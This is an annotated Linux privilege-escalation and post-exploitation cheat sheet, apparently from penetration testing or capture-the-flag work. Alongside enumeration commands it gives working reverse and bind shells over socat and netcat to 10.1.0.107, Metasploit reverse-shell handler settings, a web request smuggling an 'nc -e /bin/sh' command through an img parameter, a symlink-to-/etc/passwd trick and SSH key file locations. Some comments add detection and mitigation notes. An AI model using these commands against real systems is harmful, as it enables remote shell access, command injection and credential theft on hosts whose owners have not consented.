linux pwn
# Local host enumeration: privileged binaries, scheduled jobs, sudo rights,
# processes, sockets, writable files and installed packages. The same commands
# work as a hardening audit: baseline their output and review anything that
# changes (new setuid files, new listeners, files writable by unexpected users).

# Regular files with the setuid or setgid bit set, listed with owner and mode;
# find's error output is discarded.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null | |
# Everything matching /etc/cron.* with owner, mode and size.
ls -alh /etc/cron.* | |
# sudo rules that apply to the invoking user.
sudo -l | |
# Process list for all users.
ps -aux | |
# Listening TCP and UDP sockets, numeric, with the owning process.
netstat -tulpn | |
# ss: -l selects listening sockets, -s prints summary statistics.
ss -ls | |
# Files the current user can write; "Permission denied" lines are filtered out
# of the merged stdout/stderr stream.
find / -type f -writable 2>&1 | grep -v 'Permission denied' | |
# Installed Debian packages filtered by name. X is presumably a placeholder for
# the package being looked up.
dpkg -l | grep X | |
# Serves the current directory over unauthenticated HTTP (port 8000 by default).
python3 -m http.server | |
# Setuid files owned by root. NOTE(review): as shown, -exec has no terminating
# \; or +, so find would reject it; the first command in this list covers the
# same ground.
find / -user root -perm -4000 -exec ls -ldb {} | |
# Interactive shells over socat and netcat between the host and 10.1.0.107 on
# TCP 1333. Detection view: a bash/sh process whose parent is socat or nc, or
# whose stdio is a network socket, is a high-signal event for EDR/auditd rules;
# egress filtering to unexpected ports limits the connect-back forms.

# socat listener on TCP 1333 that forks per connection and attaches bash on a
# pty to it.
socat TCP-LISTEN:1333,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane | |
# Connects the local terminal (raw mode, no local echo) to 10.1.0.107:1333.
socat FILE:`tty`,raw,echo=0 TCP:10.1.0.107:1333 | |
# Terminal settings for the resulting session: terminal type, shell, and window
# size.
export TERM=xterm | |
export SHELL=bash | |
stty rows 40 columns 170 | |
# netcat listener on port 1333.
nc –lvp 1333 | |
# netcat connecting to 10.1.0.107:1333 with a shell attached through the
# program-execution option. Hosts that ship only a netcat build without that
# option (for example the OpenBSD variant) do not support this form.
nc 10.1.0.107 1333 –e /bin/bash | |
nc 10.1.0.107 1333 –e /bin/sh | |
# Service/version scan of every TCP port on 10.2.32.7 at the highest probe
# intensity (9). This is a noisy scan that network IDS and connection logs
# record readily.
nmap -sV -p- --version-intensity 9 10.2.32.7 | |
# Metasploit console commands (not shell): generic payload handler. The three
# "set payload" lines are alternatives; each one overrides the previous.
use multi/handler | |
set payload cmd/unix/reverse_netcat | |
set payload linux/x64/shell/reverse_tcp | |
set payload linux/x86/shell/reverse_tcp | |
# Address the handler listens on.
set LHOST 10.1.0.107 | |
run | |
# Request whose img query parameter carries a URL-encoded nc command, which
# presumably means the application passes that parameter to a shell (command
# injection). Defensive view: the encoded command is visible in web access logs
# (query strings containing "nc%20-e"), and the fix is on the application side:
# never hand request parameters to a shell; validate against an allow-list.
http://10.2.32.2/lndex.php?img=nc%20-e%20/bin/sh%2010.1.0.107%204444 | |
# Decoded form of the img value above.
nc-e /bin/sh 10.1.0.107 4444 | |
# Metasploit post module path (by its name, upgrades a shell session to
# Meterpreter).
post/multi/manage/shell_to_meterpreter | |
# Creates foo, then replaces it with a symbolic link to /etc/passwd (-f forces
# the replacement). Presumably meant for a case where a more privileged process
# later opens foo. Mitigations: privileged code should open user-controlled
# paths with O_NOFOLLOW, and the Linux fs.protected_symlinks sysctl restricts
# following links in sticky world-writable directories.
touch foo | |
ln -sf /etc/passwd foo | |
# Copies the contents of "file" to the X clipboard.
cat file | xclip -selection clipboard | |
ssh key files: id_rsa id_rsa.pub known_hosts authorized_keys (user/.ssh/) |